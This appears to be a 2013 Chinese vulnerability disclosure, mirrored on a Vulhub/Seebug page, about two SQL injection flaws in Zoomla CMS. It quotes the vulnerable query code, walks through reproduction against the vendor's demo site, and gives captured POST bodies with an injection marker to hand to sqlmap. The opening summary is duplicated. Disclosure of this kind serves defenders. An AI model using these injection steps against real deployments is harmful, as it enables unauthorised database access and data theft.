VULHUB ™

### 简要描述： 之前因为这套CMS被人叫了一回专注哥了，来提两个逐浪CMS的注入吧 ### 详细说明： 其实这套东西好多注入。 注入1： http://demo.zoomla.cn/mis/target/page.aspx TxtKey参数 string selectedValue = this.drType.SelectedValue; string text = this.TxtKey.Text; this.dt = this.bll.Sel(string.Concat(new string[] { "ParentID=0 And Inputer='", this.buser.GetLogin().UserName, "' And type like '%", selectedValue, "%' And Title like '%", text, //没有过滤直接带入查询，导致漏洞产生 "%'" }), "ID desc"); 前台注册一个用户。 先到http://demo.zoomla.cn/mis/target/AddTarget.aspx 添加一个名为test123的目标 访问下面的链接： http://demo.zoomla.cn/mis/target/page.aspx 搜索test123 [<img src="https://images.seebug.org/upload/201310/241154119ce9fb9bff993845c4a3cb99e14757d8.png" alt="image067.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/241154119ce9fb9bff993845c4a3cb99e14757d8.png) 抓取数据包，把test123修改为test123%’*--...

### 简要描述： 之前因为这套CMS被人叫了一回专注哥了，来提两个逐浪CMS的注入吧 ### 详细说明： 其实这套东西好多注入。 注入1： http://demo.zoomla.cn/mis/target/page.aspx TxtKey参数 string selectedValue = this.drType.SelectedValue; string text = this.TxtKey.Text; this.dt = this.bll.Sel(string.Concat(new string[] { "ParentID=0 And Inputer='", this.buser.GetLogin().UserName, "' And type like '%", selectedValue, "%' And Title like '%", text, //没有过滤直接带入查询，导致漏洞产生 "%'" }), "ID desc"); 前台注册一个用户。 先到http://demo.zoomla.cn/mis/target/AddTarget.aspx 添加一个名为test123的目标 访问下面的链接： http://demo.zoomla.cn/mis/target/page.aspx 搜索test123 [<img src="https://images.seebug.org/upload/201310/241154119ce9fb9bff993845c4a3cb99e14757d8.png" alt="image067.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/241154119ce9fb9bff993845c4a3cb99e14757d8.png) 抓取数据包，把test123修改为test123%’*-- __VIEWSTATE=%2FwEPDwULLTEyMzkzMzg1NzcPZBYCAgMPZBYCAgcPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VAgExB3Rlc3QxMjNkZG7nnQ6pZXGUWElWkzGHXn71ZHNY&drType=&TxtKey=test123%’*--&Button1=%E6%90%9C%E7%B4%A2 连着cookie丢到sqlmap即可： [<img src="https://images.seebug.org/upload/201310/24115447b5bf90044860b48ffabd2c78fdf11e14.png" alt="image069.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/24115447b5bf90044860b48ffabd2c78fdf11e14.png) [<img src="https://images.seebug.org/upload/201310/24115506f1f602c7cd6948ad3079000b25da12b5.png" alt="image071.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/24115506f1f602c7cd6948ad3079000b25da12b5.png) ### 漏洞证明： 注入点2： http://demo.zoomla.cn/mis/addmis.aspx title参数 protected void Button_Click(object sender, EventArgs e) … DataTable dataTable = this.bll.Sel("Title='" + this.TextTitle.Text.Trim() + "'", ""); //title参数存在注入的问题。没有过滤 … 随便输入点信息： [<img src="https://images.seebug.org/upload/201310/24115550df5a2414efa52c151368e424251eeb4c.png" alt="image073.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/24115550df5a2414efa52c151368e424251eeb4c.png) 点击确定，然后抓包 __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJMTY5OTMzNTg0ZGSXrsn5RKQ7H7z5jSEJzO1T2S1Tog%3D%3D&TextTitle=aaa&TextStatus=1&TextType=3&TextJoiner=a&StarDate=2013%2F10%2F24+10%3A50%3A01&EndDate=2013%2F10%2F24+10%3A50%3A04&TextContent=&BtnCommit=%E7%A1%AE%E5%AE%9A&ParentID= TextTitle=aaa 存在注入 带上COOKIE丢到sqlmap即可 [<img src="https://images.seebug.org/upload/201310/2411561147ba24d29ce62c3fc10a9e8bfde515db.png" alt="image075.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/2411561147ba24d29ce62c3fc10a9e8bfde515db.png) [<img src="https://images.seebug.org/upload/201310/24115625bd174a53e71d58c240cbb19090a1c085.png" alt="image077.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/24115625bd174a53e71d58c240cbb19090a1c085.png) [<img src="https://images.seebug.org/upload/201310/24115634da4a659e2b90cfa06c2aea4d55b2d525.png" alt="image079.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/24115634da4a659e2b90cfa06c2aea4d55b2d525.png)